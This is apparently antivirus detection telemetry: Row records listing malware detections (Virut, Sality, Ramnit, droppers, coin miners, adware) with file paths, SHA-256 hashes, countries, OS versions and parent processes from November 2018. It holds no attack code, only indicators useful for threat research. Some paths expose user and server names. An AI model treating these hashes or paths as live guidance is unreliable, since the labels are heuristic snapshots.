  Row(detection=Row(filename='tmp00061f98', filepath='C:\\Windows\\Temp\\tmp0000038e\\tmp00061f98', filesize=320000, name='TR/BitCoinMiner.grbmu.#M1.#R1'), hash='615bfe5a8ae7e0862a03d183e661c40a1d3d447eddabf164fc5e6d4d183796e0', metadata=Row(cmdline=None, country='KR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Program Files\\Digitalonnet\\AD-Spider\\ADSpiderEngineNT.exe', parentsize=349080, timestamp='2018-11-04T10:47:20Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-32.categorizing\\C770C4431647E097600953A9A34392E9DA29F8A3DE5DD3ADCE98DC3BC5872CA0', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='c770c4431647e097600953a9a34392e9da29f8a3de5dd3adce98dc3bc5872ca0', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:09:34Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\A97F619197743A38E1C86ADADC9762D8CE2FE76050A622B3E8F6BA94D5952929', filesize=372000, name='TR/Dropper.Gen.#M300.#R2295'), hash='a97f619197743a38e1c86adadc9762d8ce2fe76050a622b3e8f6ba94d5952929', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T11:31:45Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='at_richiesta.doc', filepath='AT_Richiesta.doc', filesize=192000, name='W97M/Agent.57918243.#M0.#R0'), hash='76a3f1717ad2ae8516e5f109758e8c421d5c563112c2ac1ce6b7f40cc3062367', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-04T08:08:08Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='logonui.exe', filepath='\\?\\C:\\Windows\\Fonts\\logonUi.exe', filesize=1024000, name='TR/Agent.bqqua.#M1.#R1'), hash='73c6c7614b1b20ea6085c1592248dfc26aedd72f3865eccb02b6f5f7fae6ee11', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='6', os_vminor='2', parentproc=None, parentsize=None, timestamp='2018-11-04T15:36:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='b88145ea3199caff8a67e4ab0da01c8bd5822fc86a39cab40c1d33e308fe10cd', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_31.10.2018-33.categorizing\\B88145EA3199CAFF8A67E4AB0DA01C8BD5822FC86A39CAB40C1D33E308FE10CD', filesize=448000, name='HEUR/AGEN.1014473.#M1.#R1'), hash='b88145ea3199caff8a67e4ab0da01c8bd5822fc86a39cab40c1d33e308fe10cd', metadata=Row(cmdline='-r', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\Kaspersky Lab\\Kaspersky Internet Security 18.0.0\\avp.exe', parentsize=354672, timestamp='2018-11-04T15:50:33Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='vc_redist.x64.exe', filepath='\\\\?\\UNC\\tawasul-server\\برامج منذر\\البرامج الهامة\\vc_redist.x64.exe', filesize=14572000, name='TR/Patched.Gen.#M300.#R3374'), hash='809913d1e4dbc9599cad663e6bdf512c357c780dbc764d2c24d1a78e3b8da449', metadata=Row(cmdline=None, country='MD', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T16:18:23Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='taskeng.exe', filepath='c:\\windows\\system32\\taskeng.exe', filesize=192000, name='TR/Crypt.XPACK.Gen2.#M300.#R100737'), hash='9e70685b73b3eab78c55863babceecc7cca89475b508b2a9c651ade6fde0751a', metadata=Row(cmdline='{2C42A77A-0BF5-4764-9D7F-A845D2E63959} S-1-5-21-2209396420-3330014840-508169338-1000:sandro-STI\\\\sandro:Interactive:Highest[1]', country='BR', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\svchost.exe', parentsize=20992, timestamp='2018-11-02T02:00:30Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fqlgznuo.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\FQlgZNUO.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='e_s50st7.exe', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\{AB1AF8A9-4061-43C6-8DD9-5B737E2EC0A7}\\E_S50ST7.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='b09f294b94153554821ebe6828724773cdff9520a49a433fd431669c29b8e003', metadata=Row(cmdline='aepdu.dll,AePduRunUpdate', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\rundll32.exe', parentsize=44544, timestamp='2018-11-02T05:42:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avast_free_antivirus_setup_offline.exe', filepath='D:\\anti\\avast_free_antivirus_setup_offline.exe', filesize=258944000, name='TR/Patched.Gen.#M300.#R3374'), hash='d3ed1cafc03523a2489e150230df7a70bb56884b276d2c04ae06f33157bbf8b6', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T04:35:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='DE', os_name='MacOS', os_vmajor='17', os_vminor='7', parentproc=None, parentsize=None, timestamp='2018-11-02T19:12:15Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='cynqmzsk.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\CyNqmZSk.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:35:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='dbpobyoh.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\DbPobyOh.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:11:51Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B1882F1D739458565CF015D0DC28751BCE40663366EF316D8ABACBCD74939CC', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='8b1882f1d739458565cf015d0dc28751bce40663366ef316d8abacbcd74939cc', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T11:59:31Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-221611-65830b78', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_32434990\\AVSCAN-20181102-221342-4F0362B5\\AVSCAN-20181102-221611-65830B78', filesize=64000, name='TR/Siggen.rcdir.#M1.#R1'), hash='fbad3124805b2597f2a57f33dbe90c81b6c12fb510ccbdfc98331a92fe9cf52e', metadata=Row(cmdline=None, country='SY', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T22:16:09Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='wmplayer.exe', filepath='C:\\Program Files\\Windows Media Player\\wmplayer.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='ac6a629e9d80f98f7dc9ae3801e534000f996f8668aef8132394a91772c88e0b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor=None, parentproc=None, parentsize=None, timestamp='2018-11-02T17:02:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='autmgr32.exe', filepath='D:\\Test_server_backup\\Public\\visual_studio_6.0Disk1\\OS\\SYSTEM\\AUTMGR32.EXE', filesize=192000, name='W32/Alman.BB.#M1.#R1'), hash='9f908a8fe65d1568416e7d0c1f3f39b7f3d014768bb74c9958900dde4b0f7ac1', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T10:02:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xocr32b.exe', filepath='C:\\Program Files (x86)\\Sharp\\Sharpdesk\\XOCR32B.exe', filesize=1536000, name='W32/Sality.AT.#M1.#R1'), hash='dc650ca8ee0ebfc411d42c34f29d868dfcb6cf2a591b9feb71920e7312c55483', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:0NU7deI9ckOKuNTJ.1', country=None, os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:48:43Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='frieza.exe', filepath='I:\\ألعاب\\Games 1\\Dd251.N\\chars\\Frieza\\Frieza.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='e9b384176c80b1ec7f9534d4d571930fc74a5aa3c5863ae09464c34aca3ef480', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:38:48Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='mlrwzlkl.exe', filepath='H:\\RECYCLER\\S-7-3-30-7060407318-4077270242-385720246-4753\\mLRwZlkl.exe', filesize=192000, name='W32/Virut.Gen.#M0.#R0'), hash='729789b8def8996d03c0bbc7c93e02c0f941e8deb6a80f1f7b25df808b596c7b', metadata=Row(cmdline=None, country='IN', os_name='Windows', os_vmajor='7', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:32:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-174941-659cb4a7', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e16ecb17\\AVSCAN-20181102-174924-62EC54D7\\AVSCAN-20181102-174941-659CB4A7', filesize=320000, name='PUA/CoinMiner.HO.#M1.#R1'), hash='84dd02debbf2b0c5ed7eebf813305543265e34ec98635139787bf8b882e7c7b4', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T16:49:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsn7A7E.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-02T22:32:36Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='similar photo cleaner', filepath='/Applications/Similar Photo Cleaner.app/Contents/MacOS/Similar Photo Cleaner', filesize=2060000, name='OSX/GT32SupportGeeks.ulklb.#M0.#R0'), hash='b68cee5ada77bb3450bd274dc23196ca5e1b7f03a4fa18e7a68112a3163a9680', metadata=Row(cmdline=None, country='CA', os_name='MacOS', os_vmajor='15', os_vminor='6', parentproc=None, parentsize=None, timestamp='2018-11-02T16:50:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='terrain.exe', filepath='I:\\ألعاب\\Games 1\\Project  ( IGI )\\MISSIONS\\location0\\LEVEL12\\TERRAIN\\TERRAIN.exe', filesize=512000, name='TR/Downloader.Gen.#M300.#R5621'), hash='750c34f9be6045cc4de53da5f11c9c51333e35383a4c1360ea3ad4ec2904d804', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe417_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe417 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='EG', os_name='Windows', os_vmajor='6', os_vminor='3', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=258560, timestamp='2018-11-02T16:40:10Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-144357-5fbca67a', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_5aa98703\\AVSCAN-20181102-144339-5CC70D54\\AVSCAN-20181102-144357-5FBCA67A', filesize=448000, name='HEUR/APC.#M1.#R1'), hash='fccb70bb3f6a6ef2a2ac2100707c181afd5e10251d6f3e65cab225eb22c3dac5', metadata=Row(cmdline=None, country='HK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T06:43:56Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='psftp.exe', filepath='C:\\Program Files (x86)\\HTC\\HTC Sync Manager\\psftp.exe', filesize=412000, name='W32/Sality.AT.#M1.#R1'), hash='f4f05a4c250e852a540c7aad9858041d3f916e6eb72ac6bd5bfaf5ab5727c6b2', metadata=Row(cmdline=None, country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=3229696, timestamp='2018-11-02T12:09:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='start.exe', filepath='\\\\n5550\\kr-server\\廣羅\\kr-server\\server行政\\0管理部\\行政部\\工商萬用管理表格管理表格\\資材管理類\\start.exe', filesize=1536000, name='W32/Stanit.#M1.#R1'), hash='e9e4bbcee22c15ff687115b07485b70611315d171207c5907dca4fd1a40f4cc8', metadata=Row(cmdline='-m:appraiser.dll -f:DoScheduledTelemetryRun -cv:1upUepgZNU2jR\\\\\\/+9.1', country='TW', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\CompatTelRunner.exe', parentsize=None, timestamp='2018-11-02T01:02:23Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='setup337.exe', filepath='\\\\?\\C:\\Users\\X\\AppData\\Local\\Temp\\gsc2lhcogjn\\Setup337.exe', filesize=1472000, name='TR/Dropper.MSIL.Gen.#M300.#R5304'), hash='d4db4d74240a34b066207a80080cadd428136c7dd2b8b60d08d42f7559f37e4e', metadata=Row(cmdline=None, country='SD', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T23:20:40Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181102-083352-547b6c32', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_e3ca1d49\\AVSCAN-20181102-083309-4D010CC2\\AVSCAN-20181102-083352-547B6C32', filesize=1792000, name='X2000M/Agent.3997.#M1.#R1'), hash='913e5ae8fa59e24bc6a3fa8eb354304469a5c22cdae47e6ef7d158189849fa81', metadata=Row(cmdline=None, country='RU', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T05:33:55Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='8b9cf355948929bb8721772d523ac0abb1b485d84063e82e7107f02d177eedba', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries 31.10.2018-37\\8B9CF355948929BB8721772D523AC0ABB1B485D84063E82E7107F02D177EEDBA', filesize=1856000, name='TR/Crypt.XPACK.Gen7.#M300.#R601541'), hash='8b9cf355948929bb8721772d523ac0abb1b485d84063e82e7107f02d177eedba', metadata=Row(cmdline=None, country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T14:17:06Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='microsoft office 2016 activator (updated).exe', filepath='C:\\Users\\X\\Desktop\\Microsoft Office 2016 Activator (Updated).exe', filesize=1984000, name='HEUR/AGEN.1034329.#M1.#R1'), hash='e53898153ce873b2ad5777a9d89306ebf3b25a0ebd5e0e0b2df2984810f7045c', metadata=Row(cmdline=None, country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-02T03:25:39Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='worldtimeclockplugin.dll', filepath='\\\\?\\H:\\Files\\Steam\\steamapps\\common\\dota 2 beta\\game\\bin\\win32\\qt_plugins\\designer\\worldtimeclockplugin.dll', filesize=216000, name='W32/Ramnit.C.#M1.#R1'), hash='dad914a4e494659fa9c5f93e7c3745962257c1a91ba5400399dbcdf48a52b957', metadata=Row(cmdline=None, country='PH', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-02T06:03:24Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='a84f4b47552a14b400866d83694f9f5b6caa8f82283f82ea75b498dc65dff63c', filepath='D:\\TotalAutomation\\CategorizationLayer\\Binaries_28.10.2018-19.available\\Avira\\A84F4B47552A14B400866D83694F9F5B6CAA8F82283F82EA75B498DC65DFF63C', filesize=1600000, name='TR/Dropper.Gen.#M300.#R7636'), hash='a84f4b47552a14b400866d83694f9f5b6caa8f82283f82ea75b498dc65dff63c', metadata=Row(cmdline='\\\\\\"D:\\\\\\\\TotalAutomation\\\\\\\\Avira1.4.py\\\\\\" ', country='DE', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Python27\\python.exe', parentsize=26624, timestamp='2018-11-02T05:44:53Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='audit casual upload.exe', filepath='D:\\AUDIT4\\Audit Casual Upload.exe', filesize=512000, name='W32/Sality.AT.#M1.#R1'), hash='faf55154b6f314050cf4568b1218ec0a0b4887455d120e84b54f601ccfe7f1bb', metadata=Row(cmdline='\\\\\\/factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding', country='ID', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\explorer.exe', parentsize=2972672, timestamp='2018-11-02T01:03:04Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='Global\\\\\\\\UsGthrFltPipeMssGthrPipe11_ Global\\\\\\\\UsGthrCtrlFltPipeMssGthrPipe11 1 -2147483646 \\\\\\"Software\\\\\\\\Microsoft\\\\\\\\Windows Search\\\\\\" \\\\\\"Mozilla\\\\\\/4.0 (compatible; MSIE 6.0; Windows NT; MS Search 4.0 Robot)\\\\\\" \\\\\\"C:\\\\\\\\ProgramData\\\\\\\\Microsoft\\\\\\\\Search\\\\\\\\Data\\\\\\\\Temp\\\\\\\\usgthrsvc\\\\\\" \\\\\\"DownLevelDaemon\\\\\\" ', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Windows\\System32\\SearchProtocolHost.exe', parentsize=164352, timestamp='2018-11-02T05:46:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='libraries.pif', filepath='C:\\Users\\X\\Libraries\\Libraries.pif', filesize=512000, name='TR/Zugy.iks.1.#M1.#R1'), hash='c4c2f4ef16473557538410aa8c176d66062d871792759f4ccd832972eb8586f8', metadata=Row(cmdline='\\\\\\/restart \\\\\\/minimized \\\\\\/froma', country='LK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\ByteFence\\ByteFence.exe', parentsize=3711816, timestamp='2018-11-02T05:46:12Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='fusion.dll', filepath='C:\\Users\\X\\AppData\\Local\\Temp\\nslB490.tmp\\Fusion.dll', filesize=896000, name='PUA/InstallCore.#M1.#R1'), hash='dcd335936e7fd1dba32881dcff49de018a24583a88ba6f4d7b1592ab9f7983b3', metadata=Row(cmdline=None, country='BR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc='C:\\Users\\X\\Downloads Temp\\Downloads\\Fotor3_3.4.1(163.15)_win32_x64_official.exe', parentsize=268416568, timestamp='2018-11-02T14:56:02Z'), dt=datetime.date(2018, 11, 2)),
  Row(detection=Row(filename='avscan-20181104-125955-43a0d915', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_79e3c184\\AVSCAN-20181104-125933-419163B5\\AVSCAN-20181104-125955-43A0D915', filesize=384000, name='PUA/CoinMiner.Gen.#M300.#R8197'), hash='c4bb691a7e52ed126caf3abf852c8e9bbde91cb37185b1d06e9acfb6f4379346', metadata=Row(cmdline=None, country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T11:59:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-133545-bec2d4ef', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_7d023303\\AVSCAN-20181104-130041-2B7A07CF\\AVSCAN-20181104-133545-BEC2D4EF', filesize=1392000, name='Adware/Pullupdate.AQ.#M1.#R1'), hash='f659ed38680efcce26318ae50405ea6d353120fa6a9343e9b16b784f10fb71ca', metadata=Row(cmdline=None, country='FR', os_name='Windows', os_vmajor='10', os_vminor='0', parentproc=None, parentsize=None, timestamp='2018-11-04T12:35:48Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0028fd6b', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp0028fd6b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T04:22:43Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='utorrentie.exe', filepath='C:\\Documents and Settings\\X\\Application Data\\uTorrent\\updates\\3.4.9_42923\\utorrentie.exe', filesize=448000, name='W32/Ramnit.CD.#M1.#R1'), hash='f264d200e12fb10b3dd55dce0e31fba01a5919012ea01654d10c477f969e1dc8', metadata=Row(cmdline=None, country='UA', os_name='Windows', os_vmajor='5', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T06:42:21Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='xtpkgtgmbiq.dll', filepath='C:\\Windows\\Temp\\nsa7C15.tmp\\xTPKGtGMbiQ.dll', filesize=1152000, name='Adware/Zdengo.fru.#M1.#R1'), hash='ea813cd4129df283f7ae7bc890fd650fc1d876e20be0e460aba3eac62a93efc0', metadata=Row(cmdline='\\\\\\/MONITOR \\\\\\/uac', country='ES', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files\\CCleaner\\CCleaner64.exe', parentsize=19467544, timestamp='2018-11-04T19:48:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='avscan-20181104-090104-9ae7469e', filepath='C:\\ProgramData\\Avira\\Antivirus\\TEMP\\AvGuardIA_96100e26\\AVSCAN-20181104-085200-5235DCE4\\AVSCAN-20181104-090104-9AE7469E', filesize=896000, name='PUA/AD.IStartSurf.Y.#M1.#R1'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T07:00:38Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='label_44796569.doc', filepath='C:\\TMP\\01\\_virs\\label_44796569.doc', filesize=64000, name='W97M/Agent.960461927.#M1.#R1'), hash='c9647a160a66b9d95f7b91c414b64549df218b2eadd252c4b1ed2d52cc6b4b7c', metadata=Row(cmdline=None, country='SK', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc=None, parentsize=None, timestamp='2018-11-04T12:47:24Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023f2f0', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023f2f0', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T22:14:30Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023911f', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023911f', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T20:35:55Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp002951c3', filepath='C:\\Windows\\TEMP\\tmp00006b29\\tmp002951c3', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T05:57:32Z'), dt=datetime.date(2018, 11, 4)),
  Row(detection=Row(filename='tmp0023b29b', filepath='C:\\Windows\\TEMP\\tmp00001300\\tmp0023b29b', filesize=896000, name='TR/Crypt.XPACK.Gen.#M300.#R4131'), hash='f96f96dd2ab9b124abc25a93555401be75b82c4724392628cb6d00d2e529426d', metadata=Row(cmdline=None, country='EG', os_name='Windows', os_vmajor='6', os_vminor='1', parentproc='C:\\Program Files (x86)\\IObit\\Advanced SystemCare Ultimate\\ASCAvSvc.exe', parentsize=1990928, timestamp='2018-11-04T21:11:55Z'), dt=datetime.date(2018, 11, 4)),
